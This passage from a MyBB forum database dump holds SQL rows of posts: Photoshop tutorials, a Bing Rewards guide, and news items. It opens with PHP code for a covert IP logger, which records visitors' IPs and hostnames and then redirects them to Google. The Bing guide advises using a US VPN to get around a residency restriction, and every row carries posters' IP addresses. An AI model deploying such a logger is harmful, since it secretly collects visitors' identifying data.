\r\n\r\n//Writing the time and date to a file\r\n\r\n$myFile = \"xxxx.txt\"; \r\n$fh = fopen($myFile, \'a\') or die(\"can\'t open file\");\r\n$stringData = \"$time\\n\";\r\nfwrite($fh, $stringData);\r\nfclose($fh);\r\n\r\n// writing Ip address to the same file \r\n\r\n$myFile = \"xxxx.txt\"; // value 1\r\n$fh = fopen($myFile, \'a\') or die(\"can\'t open file\");\r\n$stringData = \"$ip\\n\";\r\nfwrite($fh, $stringData);\r\nfclose($fh);\r\n\r\n// also writing hostname to the same file \r\n\r\n\r\n$myFile = \"xxxx.txt\"; // value 2\r\n$fh = fopen($myFile, \'a\') or die(\"can\'t open file\");\r\n$stringData = \"$hostaddress\\n\";\r\nfwrite($fh, $stringData);\r\nfclose($fh);\r\nprint \"<strong> </strong><br />\\n\"; \r\nif ($referred == \"\") {\r\nprint \"\"; \r\n}\r\nelse {\r\nprint \"$referred\";\r\n}\r\n?>\r\n\r\n<!-- Redirecting to a different page (this is optional just delete this javascript if you don\'t want to redirect) -->\r\n<script type=\"text/javascript\">\r\n<!--\r\nwindow.location = \"http://www.google.com/\"\r\n//-->\r\n</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n[/code]\r\n\r\nSorry if in wrong section.. Didn\'t know where to put it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c35335ce48b2ba16e02db40c05096881', '0', '0'); INSERT INTO mybb_posts VALUES('3006', '617', '0', '34', 'Absract Photoshop Tutorial', '0', '82', 'iTzIpod', '1349035770', 'I found this and I used this for a while\r\n\r\nFirst of all, create a Photoshop document of any size, I am using 400x110 pixels.\r\n\r\n- Fill the background in pure black #000000. Now make sure that your Foreground colour is Black (#000000[/b]) and that your background is White (#FFFFFF). You can do this by simply hitting D on your keyboard.\r\n\r\n- Go to the blending options for this layer and use the following settings (Click image to enlarge):\r\n\r\n\r\n- Now create a new layer, fill it black and set the blending mode to screen. Now go to the blending options and click on Gradient overlay again, this time you want Foreground to Transparent, which should be a built-in custom gradient. The gradient needs to go from Black to pure transparency, like so (Click image to enlarge):\r\n\r\nDon\'t forget to tick the Reverse box!\r\n\r\n- Now create a new layer, grab an abstract brush (I used brushes from here) make sure that your foreground colour is Black and use the brush like a stamp. Don\'t hold the mouse button down, just stamp the brush wherever you want to. Do the same again on a new layer, except using White rather than Black. You should end up with something like this:\r\n\r\n\r\n- This is optional, but you can duplicate your white Brushed layer (Ctrl+J), and then you can go to Filter>>Blur>>Radial Blur. I used the following settings:\r\n\r\nI then pressed Ctrl+F a few times, and set the layers blending mode to Overlay.\r\n\r\n- Now you need a render. Find a Render. I\'ve pasted mine in my sig below:\r\n\r\n\r\n- Remember my Render Blending tutorial? You could use some techniques in that tutorial right here if you wanted (Although you should probably avoid colouring for now).\r\n\r\n- Get your Abstract Brushes out again (I\'m using a different set this time, from here) and stamp it on the tender, sometimes this can make it look like the character in the render has some sort of mystical energy. And mystical energy is cool. Note that with the brushes I used, I duplicated their layers a few times to make the brushing stand out a little bit more. Here is what I have so far:\r\n\r\n\r\n- Desaturate your Render by pressing Shift+Ctrl+U (Optional).\r\n\r\n- Click on Layer>>New Adjustment Layer>>Colour Balance and mess around with the settings until you get something that you like. Or, if you want to, you could use a colour Balance individually for each layer for clicking on the layer and pressing Ctrl+B. It\'s up to you. Experiment. Here\'s what I have, I used two colour balance layers:\r\n\r\n\r\n- Now to add a border! Create a New layer above all of the others and fill it with Black. Set the blending mode to Screen and then go to the Blending Options. Use the following layer styles (Click the image to enlarge):\r\n \r\n\r\n- Now do some customization of your own! Add text, or make any other finishing touches to make this sig suit you. Here is my final result, with some of my own personal edits put in:\r\n\r\n\r\nI hope that you found this tutorial useful and I hope that it helps you in the future!\r\n\r\n\r\n\r\nI know there are no pictures. And I apologize for that. I don\'t own this tutorial. So I don\'t own the pictures. I can\'t post the pictures on here too.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9639ad26a0483af445981941100f599e', '0', '0'); INSERT INTO mybb_posts VALUES('3007', '618', '0', '34', 'Animated/Running Text Signature Tutorial', '0', '82', 'iTzIpod', '1349035855', '[align=center][font=Verdana][color=#9400D3][size=xx-large]How To Make Running Light effect Text [ Photoshop ][/size][/color][/font][/align]\r\n\r\n\r\n[size=large]Step - 1\r\n\r\nFirst Open a new document in photoshop -[/size]\r\n\r\n[spoiler][img]http://i.imgur.com/OnI1q.png[/img][/spoiler]\r\n\r\n\r\n[size=large]Step - 2\r\n\r\nFill The background with silver colour which i choose as shown in the image below.[/size]\r\n\r\n[spoiler][img]http://i.imgur.com/T7jnC.png[/img][/spoiler]\r\n\r\n\r\n[size=large]or you may also choose any colour that you want depends on your creativity..[/size]\r\n\r\n\r\n[size=large]Step - 3\r\n\r\nNow select the HORIZONTAL TYPE TOOL & write any text you want to type.I type my name as ROCKSTER.\r\n\r\nNow you have something like that - [/size]\r\n\r\n[spoiler][img]http://i.imgur.com/OYJTN.png[/img][/spoiler]\r\n\r\n\r\n[size=large]To make your text looks larger select your text layer & click ctrl+t.\r\nnow you have the option to increase the dimensions to make your text larger.\r\n\r\nNow your text looks like that - [/size]\r\n\r\n[spoiler][img]http://i.imgur.com/PTOPe.png[/img][/spoiler]\r\n\r\n\r\n[size=large]step - 4\r\n\r\nnow make a new layer & select the brush tool.[/size]\r\n\r\n[spoiler][img]http://i.imgur.com/HvYop.png[/img][/spoiler]\r\n\r\n[spoiler][img]http://i.imgur.com/iDbVe.png[/img][/spoiler]\r\n\r\n[spoiler][img]http://i.imgur.com/nbk5Z.png][/img][/spoiler]\r\n\r\n\r\n[size=large]Step - 5\r\n\r\nNow go to window>animation.\r\nAnimation window will open in the bottom like that -[/size]\r\n\r\n[spoiler][img]http://i.imgur.com/iGWic.png[/img][/spoiler]\r\n\r\n\r\n[size=large]Step - 6\r\n\r\nNow the main part - [/size]\r\n\r\n[spoiler][img]http://i.imgur.com/Oam5y.png[/img][/spoiler]\r\n\r\n\r\n[size=large]Step - 7\r\n\r\nNow right click on your layer 1 & click on create clipping mask .\r\nnow you have something like that - [/size]\r\n\r\n[spoiler][img]http://i.imgur.com/iNRTL.png[/img][/spoiler]\r\n\r\n\r\n[size=large]Step - 8\r\n\r\nNow click on tweens animation frames - [/size]\r\n\r\n\r\n[spoiler][img]http://i.imgur.com/ZxVOw.png[/img][/spoiler]\r\n\r\n\r\n[size=large]A new tab will open do the same settings like shown in the image - [/size]\r\n\r\n[spoiler][img]http://i.imgur.com/fqe7h.png[/img][/spoiler]\r\n\r\n\r\n[size=large]Now you have something like that - [/size]\r\n\r\n[spoiler][img]http://i.imgur.com/ASBaq.png[/img][/spoiler]\r\n\r\n\r\n[size=large]Now you are done.....\r\n\r\nJust click on the play button to check........[/size]\r\n\r\n[spoiler][img]http://i.imgur.com/BnLNe.png[/img][/spoiler]\r\n\r\n\r\n[size=large]Final Image - [/size]\r\n\r\n[img]http://i.imgur.com/sdk9n.gif[/img]\r\n[size=large]\r\nTo save this image click - [/size]\r\n\r\n[size=large]alt+shift+ctrl+s\r\n\r\nto save your image as web & devices......[/size]\r\n\r\n\r\n\r\n[color=#FF0000][align=center][size=x-large]Hope you guys like this small & effective tut......\r\n\r\nEnjoy..........[/size][/align][/color]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '147eb74f06af2917a83a72159ea38ab0', '0', '0'); INSERT INTO mybb_posts VALUES('3008', '619', '0', '34', '[Photoshop CS5] How to make a logo', '0', '82', 'iTzIpod', '1349035943', '[color=#FF0000][align=center]Making a Logo in Photoshop CS5[/align][/color]\r\n\r\n\r\nStep 1\r\n\r\nCreate a working file that\'s large enough to do some experimentation on at the full resolution your logo will be displayed at. If you\'re not certain what resolution your logo will need to be make it at 300 dpi; it\'s always easier to go from high resolution imagery to low resolution imagery than the other way around. A worthwhile recommendation is to make your image about 4 in. by 4 in.\r\nStep 2\r\n\r\nSet up your working layers in the \"Layers\" palette. You will want one layer for each element of your logo.\r\nStep 3\r\n\r\nUse the \"Shape\" tool to make the background element of your logo; select an oval or rectangle, as you see fit. Hold down the \"Shift\" key as you drag the shape to make it a perfect square. Make it the dominant color you want in your logo. Put this shape on your bottom layer.\r\nStep 4\r\n\r\nSelect the next layer up, and click on \"Shape\" again, and select \"Custom Shape Tool.\" This will change the options on the top menu bar, and one of the options presented will be a little amoeba shaped icon. Clicking this icon will pull up the Custom Shape palette. Select a custom shape that suits your design goals, and expand it to cover most of your background colored shape – set the color on this shape to white.\r\nStep 5\r\n\r\nResize and rotate the shape to get the effect you want – logos usually have two or three colors tops, and have a shape that creates an outline or overlay on a solid color background.\r\nStep 6\r\n\r\nPlay with the overlay of shapes until you get a result you like, then lay company contact information around it. You can also explore the options of layer effects in Photoshop, including Bevel and Emboss, and textures, to make your shapes look metallic, or raised, or stamped into plastic.\r\n\r\n[color=#FF0000][align=center]Tip[/align][/color]\r\n\r\n\r\n\r\nThe two most important elements in a logo are contrast and visual simplicity. White text or shapes on a brightly colored background tend to work best. Avoid making your logo visually cluttered; simpler is almost certainly better.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9a43f3a89c1134e70ae4b3efc947aa43', '0', '0'); INSERT INTO mybb_posts VALUES('3009', '620', '0', '34', '? Photoshop ? Complete Guide for Begginers [High Quality]', '0', '82', 'iTzIpod', '1349036135', '[color=#FFD700][align=center][IMG]http://dl.dropbox.com/u/30675916/Thread/intro.png[/IMG]\r\n\r\n[B]Hello! In this thread I\'ll give you some ideas and informations how to get started before you say \"Photoshop is hard to use!\" because if you say that, you\'re wrong. It\'s easy to use after you learn the basics and practice a little.\r\n\r\nBut, before I begin with the guide itself, let me show some exemple of what you can do with the power of Photoshop. ;)[/B]\r\n\r\n[B]Photo Manipulation:[/B]\r\nPhoto manipulation is the application of image editing techniques to photographs in order to create an illusion or deception (in contrast to mere enhancement or correction), through analog or digital means.\r\n\r\n[url]http://www.youthedesigner.com/wp-content/uploads/2009/09/photoshop-examples-21.jpg[/url]\r\n[url]http://webdesignledger.com/wp-content/uploads/2010/04/photo_manipulation_12.jpg[/url]\r\n[url]http://webdesignledger.com/wp-content/uploads/2010/04/photo_manipulation_34.jpg[/url]\r\n[url]http://webdesignledger.com/wp-content/uploads/2010/04/photo_manipulation_23.jpg[/url]\r\n\r\n[B]Typography:[/B]\r\nTypography is performed by typesetters, compositors, typographers, graphic designers, art directors, comic book artists, graffiti artists, clerical workers, and anyone else who arranges type for a product.\r\n\r\n[url]http://d2f8dzk2mhcqts.cloudfront.net/117_Earth/final_1920.jpg[/url]\r\n[url]http://webdesignledger.com/wp-content/uploads/2011/06/typeinp13.jpg[/url]\r\n[url]http://webdesignledger.com/wp-content/uploads/2011/06/typeinp16.jpg[/url]\r\n[url]http://webdesignledger.com/wp-content/uploads/2011/06/typeinp18.jpg[/url]\r\n\r\n[B]WebDesign:[/B]\r\nMost of the websites are now designed using Photoshop because there you have unlimited ways to customize your website and make it how you want it to be.\r\n[url]http://fc03.deviantart.net/fs71/f/2010/013/a/e/Web_design__Amazium_by_sergitosuanez.jpg[/url]\r\n[url]http://slodive.com/wp-content/uploads/2010/04/single/ormanclark.jpg[/url]\r\n[url]http://dl.dropbox.com/u/30675916/FreshFolio.jpg[/url] (by me)\r\n[url]http://dl.dropbox.com/u/30675916/FreshBlue.png[/url] (by me)\r\n\r\n[B]Now because I got your atention and I know that you want to learn how to do that, I\'ll start with the guide.[/B]\r\n\r\n[IMG]http://dl.dropbox.com/u/30675916/Thread/basics.png[/IMG]\r\n\r\n[B]The first step is to learn the basics of Photoshop, and that means we must learn how to use the tools, filters and the other many options of PS.\r\nTo learn that, I\'ll add the links for some tutorials from YouTube.\r\nRemember! This is a verry important step, so don\'t jump over this. You can\'t do much if you don\'t know how to use Photoshop... So.[/B]\r\n\r\n[B]1. Tool Uses & Basics -[/B] Good tutorial for learning how to use the tools and some other basics.\r\n[url=http://www.youtube.com/watch?v=o-u-OYz2qaU]Photoshop Tutorial - Tool Uses and Basics - YouTube[/url]\r\n\r\n[B]2. Opening and Saving Files -[/B] Yes, the most important part is to know how to save your hard work and open it later for re-editing or to send it to someone.\r\n[url=http://www.youtube.com/watch?v=vgJamJ3x3ro]PhotoShop CS5 for Beginners - #02. Opening and Saving Files - YouTube[/url]\r\n\r\n[B]3. Resizing Images -[/B] 6 Minutes tutorial. You have nothing to lose by learning how to resize a image without losing the quality.\r\n[url=http://www.youtube.com/watch?v=PCUUtWfKHvE]Photoshop CS4 - Resizing Images - YouTube[/url]\r\n\r\n[B]4. Beginner Masking Technique -[/B]In this tutorial you\'ll actually learn how to cut someone or even an object from a picture and place it over another picture/background (Exemple. You cut the bird shape from a picture and put it on a background with the sky.)\r\n[url=http://www.youtube.com/watch?v=evn98n_yLn8]Photoshop CS4 - Beginner Masking Technique - YouTube[/url]\r\n\r\n[B]5. Using the pen tool -[/B] How to use the pen tool in photoshop. Skills covered in this tutorial include curving, defining anchor points, and making custom shapes using the pen tool.\r\n[url=http://www.youtube.com/watch?v=K2KpgJZVz2M]Photoshop CS4 - Using The Pen Tool (Basics) - YouTube[/url] (Making Shapes)\r\n[url=http://www.youtube.com/watch?v=-RRG3dw4uQY]Photoshop CS4 - Using The Pen Tool For Paths (And Curvy Text!) - YouTube[/url] (Using The Pen Tool For Paths)\r\n\r\n[B]6. Quick Photofilter Effect -[/B] This will help you in changing the colors of the picture to something darker/lighter than the original.\r\n[url=http://www.youtube.com/watch?v=-I5kBVYzz8o]Photoshop CS4 - Quick Photofilter Effect - YouTube[/url]\r\n\r\n[B]7. Changing Hair/Eye Color -[/B]Get more skills in colors editing by following this guide to learn how to change hair and eyes color but you can do the same for other things.\r\n[url=http://www.youtube.com/watch?v=GrwgMer9-_U]Changing Hair/Eye Color in Photoshop! - YouTube[/url]\r\n\r\n[B]8. How To Smudge -[/B] Smudging is a verry used method in signatures and wallpapers. I suggest you to take a look.\r\n[url=http://www.youtube.com/watch?v=Cf56fT_eeAE]How To Smudge | Photoshop Tutorial - YouTube[/url]\r\n\r\n[B]9. Adjustment Layers -[/B] Use the adjustment layers, give your photos and wallpapers nice effects. This is based on colors changing but verry usefull.\r\n[url=http://www.youtube.com/watch?v=zk4gpNVwPd8]Photoshop: Adjustment Layers (HD) - YouTube[/url]\r\n\r\n[B]10. Downloading, Installing, and Using Brushes -[/B] Brushes are used most of the time in wallpapers and signatures and in this guide you\'ll learn how to download, install and how to use them.\r\n[url=http://www.youtube.com/watch?v=yi4ZePnvrPE]Downloading, Installing, and Using Brushes in Photoshop! - YouTube[/url]\r\n\r\n[B]Awesome! You\'re on the right way to a professional designer. \r\nAnd now because we know the basics of Photoshop we can go at the next level of tutorials.[/B]\r\n\r\n[IMG]http://dl.dropbox.com/u/30675916/Thread/advanced.png[/IMG]\r\n\r\n[B]Don\'t worry, advanced doesn\'t means it\'s for the pro designers, it means that we\'ll focus on creating designs with more work, like wallpapers, signatures, web designs, etc.\r\nYou don\'t need to follow all of the guides I\'ll post, but at least try to follow some of them or maybe you want to focus on only one of the designs types.\r\nSo, lets start with some video tutorials because there you can see exactly how it\'s made, not like pictures tutorials.[/B]\r\n\r\n[B]1. Signatures -[/B] The signatures are mostly used for forums as something that will represent yourself and are not larger than 500x250(Horizontal) / 250x500(Vertical), not because I say but if it\'s larger it can be considered wallpaper. I normaly use a size around 400x160 but it\'s up to you.\r\n[url=http://www.youtube.com/watch?v=i9uFoUtlAhE]Photoshop Signature Tutorial - Stock & Texture Part 1 - YouTube[/url] (Good tutorial to learn how to use textures, stocks and brushes.)\r\n[url=http://www.youtube.com/watch?v=WMozxJANdkM]Photoshop Signature Tutorial - Stock & Texture Part 2 - YouTube[/url] (Part 2)\r\n[url=http://www.youtube.com/watch?v=PKCk_A3IF3k]Photoshop Stock Signature Tutorial - Beginner - YouTube[/url]\r\n[url=http://www.youtube.com/watch?v=rXsmznijzMA&feature=related]HD Photoshop Sig Tutorial - Great Outcome - YouTube[/url] (We\'re using Smudging method!)\r\n[url=http://www.youtube.com/watch?v=L9y2mwUsXt8]Photoshop Signature Tutorial-Halo Render - YouTube[/url] (Learn how to use the adjustment layers on signatures.)\r\n\r\n[B]2. Text Effects -[/B] Learn how to create different kind of text styles.\r\n\r\n[url=http://www.youtube.com/watch?v=jMzv1M1bsDI]#28 Photoshop - Orange Power Wallpaper Tutorial - YouTube[/url]\r\n[url=http://www.youtube.com/watch?v=VO4gTWzBM_A]Photoshopping Neon Text Tutorial (@photoguides) - YouTube[/url]\r\n[url=http://www.youtube.com/watch?v=8OtfA4ou4k0]Improved Photoshop Glass Effect Tutorial - YouTube[/url]\r\n[url=http://www.youtube.com/watch?v=8vux1Oe8oWo]Realistic Fire Text Effect - Photoshop CS5 Tutorial - YouTube[/url]\r\n[url=http://www.tutorial9.net/tutorials/photoshop-tutorials/add-visual-texture-3-easy-steps/]Add Visual Texture 3 Easy Steps | Tutorial9[/url]\r\n\r\n[B]3. Photo Manipulation & Editing -[/B] Photo manipulation tutorials. Create designs by combining more pictures in one. Learn how to Add nice effects to pictures.\r\n[url=http://www.youtube.com/watch?v=tY2BBtPYips]Photoshop - Photo Manipulation - YouTube[/url] (The apple with lion face.)\r\n[url=http://www.youtube.com/watch?v=LTuXTxkAQgo]Photoshop CS4 Rainbow eyes tutorial. - YouTube[/url]\r\n[url=http://www.youtube.com/watch?v=6wHajsp12_U]Photoshop Tutorial: How to Create a Dazzling Dance Photo Manipulation - YouTube[/url]\r\n[url=http://www.youtube.com/watch?v=pzhT1OwLe9Y]\"Neuance\" Photo Effect | Photoshop CS5 Tutorial - YouTube[/url]\r\n[url=http://www.youtube.com/watch?v=koCwduw6-Ug]Adobe Photoshop Tutorial: Vintage & Retro - YouTube[/url]\r\n[url=http://www.youtube.com/watch?v=3rTkzBUhGwE]Maximize Detail Depth and Drama using Photoshop - YouTube[/url]\r\n\r\n[B]4. Typography -[/B] Learn how to make some cool typographic designs using the next tutorials.\r\n[url=http://www.youtube.com/watch?v=oEKWDocbmGk]Photoshop Tutorial - Typographic Design [HD] - YouTube[/url]\r\n[url=http://www.youtube.com/watch?v=1ycc-XL0Hdk]Photoshop Tutorial - Retro typography wallpaper - YouTube[/url]\r\n[url=http://www.youtube.com/watch?v=_9HOGrMoGlk]Simple Typography Tutorial - YouTube[/url]\r\n\r\n[B]5. Web Design -[/B] Some medium difficulty and well explained tutorials that will help you to start your career in web designing...\r\n[url]http://www.ultimatedesignertoolkit.com/tutorials/create-light-grunge-website-layout/[/url]\r\n[url]http://psd.fanextra.com/tutorials/how-to-create-an-effective-coming-soon-page/[/url]\r\n[url]http://www.psdcore.com/tutorials/web-layouts/modern-web-20-web-layout/[/url]\r\n[url]http://www.hv-designs.co.uk/2009/11/30/cloud9-web-design-layout/[/url]\r\n[url]http://artbox7.com/blog/tutorials/create-a-baby-template-in-photoshop-using-complete-designer-set.html[/url]\r\n\r\n[B]Now that\'s what I found on YouTube to be for easy to medium difficulty. \r\nSo, I\'ll go to part 4 where I\'ll tell you where you can find more tutorials and resources for Photoshop.[/B]\r\n\r\n\r\n-------------------------------------------\r\n\r\n\r\n\r\n\r\n[IMG]http://dl.dropbox.com/u/30675916/Thread/resources.png[/IMG]\r\n\r\n[B]1. Tutorials Websites -[/B] There\'s a list with websites where you can find thousands of tutorials and new ones coming everyday.\r\n[url]http://psd.tutsplus.com/[/url]\r\n[url]http://www.tutorial9.net/[/url]\r\n[url]http://photoshoptutorials.ws/[/url]\r\n[url]http://www.photoshoplady.com/[/url]\r\n[url]http://www.photoshopstar.com/[/url]\r\n[url]http://bestphotoshoptutorials.net/[/url]\r\n[url]http://www.adobetutorialz.com/categories/Adobe-Photoshop[/url]\r\n[url]http://www.psdvault.com/[/url]\r\n[url]http://psdvibe.com/category/photoshop/[/url] (Many Web Design tutorials.)\r\n[url]http://www.tutorialized.com/[/url] (Many PS Tutorials, including over 100 Web Design Tuts.)\r\n\r\n[B]2. Brushes Websites -[/B] Download brushes for your upcoming designs. Check the tutorial in Photoshop basics to learn how to install them.[/SIZE]\r\n[url]http://www.brusheezy.com/[/url]\r\n[url]http://myphotoshopbrushes.com/[/url]\r\n[url]http://www.psbrushes.net/[/url]\r\n[url]http://www.brushking.eu/[/url]\r\n[url]http://qbrushes.net/[/url]\r\n[url]http://www.brushlovers.com/[/url]\r\n[url]http://www.deviantart.com/[/url] (Use the search.)\r\n\r\n[B]3. Textures Websites -[/B] Download textures for your upcoming designs. Check the tutorial in Part 2 to learn how to use them.\r\n\r\n[url]http://www.textureking.com/[/url]\r\n[url]http://lostandtaken.com/[/url]\r\n[url]http://www.texturise.com/[/url]\r\n[url]http://www.grungetextures.com/[/url]\r\n[url]http://designm.ag/resources/2000-absolutely-free-textures/[/url]\r\n[url]http://www.smashingmagazine.com/2009/02/06/100-beautiful-free-textures/[/url]\r\n[url]http://www.deviantart.com/[/url] (Use the search.)\r\n\r\n[B]4. Stock Photo Sites -[/B] Download free stock for your upcoming designs.\r\n[url]http://www.stockvault.net/[/url]\r\n[url]http://www.everystockphoto.com/[/url]\r\n[url]http://www.deviantart.com/[/url]\r\n[url]http://www.shutterstock.com/[/url] (It\'s not Free!)\r\n[url]http://www.freedigitalphotos.net/[/url]\r\n\r\n[B]5. Fonts Websites -[/B] Download text fonts for your upcoming designs.\r\n[url]http://www.urbanfonts.com/[/url]\r\n[url]http://www.dafont.com/[/url]\r\n[url]http://www.ffonts.net/[/url]\r\n[url]http://www.fontspace.com/[/url]\r\n\r\n[B]6. Renders -[/B]Download free renders for your upcoming designs.\r\n[url]http://planetrenders.net/[/url]\r\n[url]http://www.premiumrenders.net/gallery/[/url]\r\n[url]http://pandorascanvas.com/gallery/album/2.html[/url]\r\n[url]http://22pixels.com/browse/renders/[/url]\r\n\r\n[B]7. PSD Files -[/B] Download free Photoshop files.\r\n[url]http://365psd.com/[/url]\r\n[url]http://freepsdfiles.net/[/url]\r\n[url]http://www.freebiepixels.com/[/url]\r\n[url]http://psdho.me/[/url]\r\n[url]http://www.hotpsd.com/[/url]\r\n\r\n[B]8. Online Tools & Images Hosting -[/B] Some more websites that will help you to upload your images, find fonts & pictures.\r\n[url]http://new.myfonts.com/WhatTheFont/[/url] - Find fonts used in logos or other designs.\r\n[url]http://www.tineye.com/[/url] - Reverse image search. Start by an edited picture to see the original one.\r\n[url]http://dropbox.com/[/url] - One of the best images hosting website. I recommend it.\r\n[url]http://photobucket.com/[/url] - The second images hosting website in my top.\r\n[url]http://www.toggl.com/[/url] - Time tracking tool for freelance web developers and designers who tend to get paid by the hour.\r\n\r\n[B]Thankyou for reading the guide and I hope this helped you in your graphic design career. :)\r\n\r\nCredits: Goes to me \r\nand [size=xx-small]blachex[/size]\r\n\r\n[/align][/color]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '857e568f175957f13595d3a302cd2251', '0', '0'); INSERT INTO mybb_posts VALUES('3010', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '100', '??zg???g????61', '1349036350', '[quote=\'iTzIpod\' pid=\'3001\' dateline=\'1349031624\']\r\nIs it for your thread or just for your signature? O_o\r\n\r\nBecause if it\'s for your thread, you\'re probably talking about a banner or template.\r\n[/quote]\r\n\r\n\r\n\r\nNope its for my signature.', '65.96.215.138', '1096865674', '1', '0', '100', '1349036406', '1', '5af44cdea7fa26e6f17c2748f82848aa', '0', '1349036406'); INSERT INTO mybb_posts VALUES('3011', '621', '0', '61', 'Free Skype Credits from Bing Rewards', '0', '82', 'iTzIpod', '1349036377', '[img]http://www.flaxg.com/wp-content/uploads/2012/09/Free-Skype-Credit.jpg[/img]\r\n\r\nBing recently announced the Ultimate Bing Experience Sweepstakes and much more. By Participating in those sweepstakes you can Get Free Skype Credits Worth $1.46. Cheap Internationale Calls can done using these Free Skype credits.\r\n\r\nBing is the second largest search engine on the web; most of the users in United States are using Bing as Default search engine. According to the Alexa Global Traffic Ranking it’s in 22nd position. In United States its Alexa Traffic Ranking is in 14th position. Bing is the Top competitor for Google.\r\n\r\nGet Started With Free Skype Credits:\r\n\r\n[color=#FF0000][Before Going Below , Make sure you Have USA VPN/ Proxy , Becuse this Method only works for US residencial peoples][/color]\r\n\r\nFree Skype Credit\r\nBefore we get started you need to have Hotmail or Facebook account.\r\n\r\nStep 1: Go to http://www.bing.com/explore/rewards\r\n\r\nStep 2: After you open the page you will find an option “Join Now” go to that page and you will find an options to Claim your Bing Rewards account with\r\n\r\n1. Claim your rewards with Facebook\r\n\r\n2. Claim your rewards with Windows live\r\n\r\nJust Sign Up using any of the options on the page. If you don’t have the Hotmail & Facebook account you will find an option to Sign Up for those accounts.\r\n\r\nStep 3: After signing up successfully just go to the “Dashboard” where you will find some Task’s.\r\n\r\nStep 4: Daily you need to Complete those Task’s you will be rewarded with some Credits.\r\n\r\nStep 5: After you complete the Task’s in “Dashboard”, you need to go to “Tours” again there you will find 2 options “Welcome” & “Explore Bing”.\r\n\r\nStep 6: Complete all the Bing Rewards Tours in those above 2 options, after you complete those Tours you will be rewarded with some Bing Credits and these points are one time points.\r\n\r\nStep 7: And this way you need to complete few Task’s every day doing some simple Bing Searches and Clicks.\r\n\r\nStep 8: Daily you can earn up to 15 Credits by doing 30 Bing Searches and few points for completing some Task’s or clicks.\r\n\r\nStep 9: After you generate few credits you can redeem those credits. In the Bing Rewards page you will find an option “Redeem”, just go to that page and you will see May Offers.\r\n\r\nHow to Redeem Bing Credits:\r\n\r\nYou will find many Offers to redeem those Bing Credits; you need to collect required credits to Redeem or to participate in Bing Sweepstakes.\r\n\r\nTo get Free Skype Credits you need to have 100 Bing Credits, and to get Amazon $5 Gift Card you need to have 525 Bing Credits. On the site you will find many Offers. And you can enter in to Bing Sweepstakes to win Xbox 360 for Kinect Prize Pack with “FIFIA Soccer 13” and much more Sweepstakes are available.\r\n\r\n[img]http://www.flaxg.com/wp-content/uploads/2012/09/Bing-Rewards-leveles-300x276.jpg[/img]\r\n\r\nFree Skype Credits – Bing Rewards levels\r\nAnd there are some Levels where you can get some Bonus and Discounts on the Sweepstakes and Offers, there are 3 levels\r\n\r\nMember\r\nSilver\r\nGold\r\nIf you reach Gold Level you have all the Benefits where you can get Free Skype Credits for only 90 Bing Credits. And up to 10% Discounts on all other rewards and etc.\r\n\r\nHow to Redeem Free Skype Credits:\r\n\r\nAfter you reach 100 Bing Credits you can redeem those credits to get Free Skype Credits, after redeeming those credits within a few minute you will be emailed with Free Skype Credit Code and instructions to redeem those Free Skype Credits.\r\n\r\nVisit www.skype.com/voucher\r\nSign in to your Skype Account\r\nYou will find an option to Redeem the coupon code\r\nEnter your Free Skype Credit Code there and agree to the Skype Terms of Use and Click Redeem\r\nWithin few seconds you Free Skype Credits will be Credited to your Skype Account.\r\nEach Free Skype Credit Worth is $1.46\r\n\r\nFree Skype Credits – Skype Telephony Voucher\r\n\r\n[img]http://www.flaxg.com/wp-content/uploads/2012/09/Skype-Telephony-Voucher-300x49.jpg[/img]\r\n\r\nUsing the above methods you can Generate Unlimited Free Skype Credits Daily. And call your Friends and Family for Free and stay connected with them. Cheap International and VoIP Calls can be done using Free Skype Credits.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '99836e5875f4adc5638a7f42c781c8b1', '0', '0'); INSERT INTO mybb_posts VALUES('3012', '614', '3002', '3', 'RE: Absence for 5 days', '0', '1', 't3h jok3r', '1349036628', 'Bye and have a safe journey.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '88f2b5d3e59539c45503e5a4a80c2b23', '0', '0'); INSERT INTO mybb_posts VALUES('3013', '622', '0', '42', 'Founder of the Pirate Bay Gottfrid Svartholm Arrested in Cambodia', '0', '82', 'iTzIpod', '1349037236', '[align=center][img]http://4.bp.blogspot.com/-DC0Jfdtk_n4/UELSDdP7AXI/AAAAAAAAFMo/aN_p-CwIdpA/s1600/Founder+of+the+Pirate+Bay+Gottfrid+Svartholm+Arrested+in+Cambodia.jpg[/img][/align]\r\n\r\nReports indicate that the founder of the popular file-sharing site The Pirate Bay, Gottfrid Svartholm, was arrested up by Cambodian police on Thursday.\r\n\r\n\r\nThere\'s no indication as to what the 27-year-old was specifically arrested for, but Svartholm\'s lawyer has since been quoted as saying that the arrest likely relates to Svartholm\'s presence on an \"international wanted list.\"\r\n\r\n\r\nAlthough there\'s no formal extradition treaty between Cambodia and Sweden, it\'s possible that Svartholm could be shipped back to Sweden to begin serving a 12-month jail sentence finalized in October of last year.\r\n\r\n\r\nSvartholm was originally supposed to join three Pirate Bay colleagues in a November 2010 decision by the Swedish Appeal Court, which doled out prison sentences ranging from four to 10 months and millions of dollars\' worth of damages to the trio.\r\n\r\n\r\nSvartholm\'s sentence, however, was not finalized at that time, as medical reasons prevented him from attending the related hearings. Since then, he had proven increasingly impossible to locate – so much so, that his verdict was finalized by the same Court of Appeal last October without him even being present. He was expected to begin serving his sentence in early January – 12 months in jail and a large chunk of fines split between the four Pirate Bay defendants in total – but did not appear.\r\n\r\n\r\nThe four Pirate Bay accomplices were initially charged with \"assisting copyright infringement\" and \"assisted making available copyright infringement\" in January of 2008. Although Swedish prosecutors had to drop the \"assisting copyright infringement\" charge on the second day of the trial, they were ultimately successful in showing that the group was responsible for making 33 different copyrighted files available for sharing on the main Pirate Bay site.\r\n\r\n\r\nSvartholm was arrested in his home city of Phnom Penh. There haven\'t been any additional updates as to the condition of his health, nor any speculation as to how that might play into his potential extradition and jail sentence.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f6ca7c5e397c210bc877fa4d1b54dc9f', '0', '0'); INSERT INTO mybb_posts VALUES('3014', '623', '0', '42', 'Mom poured bleach into baby\'s eyes', '0', '82', 'iTzIpod', '1349037328', 'Mom \'Repeatedly Poured Bleach into her toddler\'s EYES until her Sight was 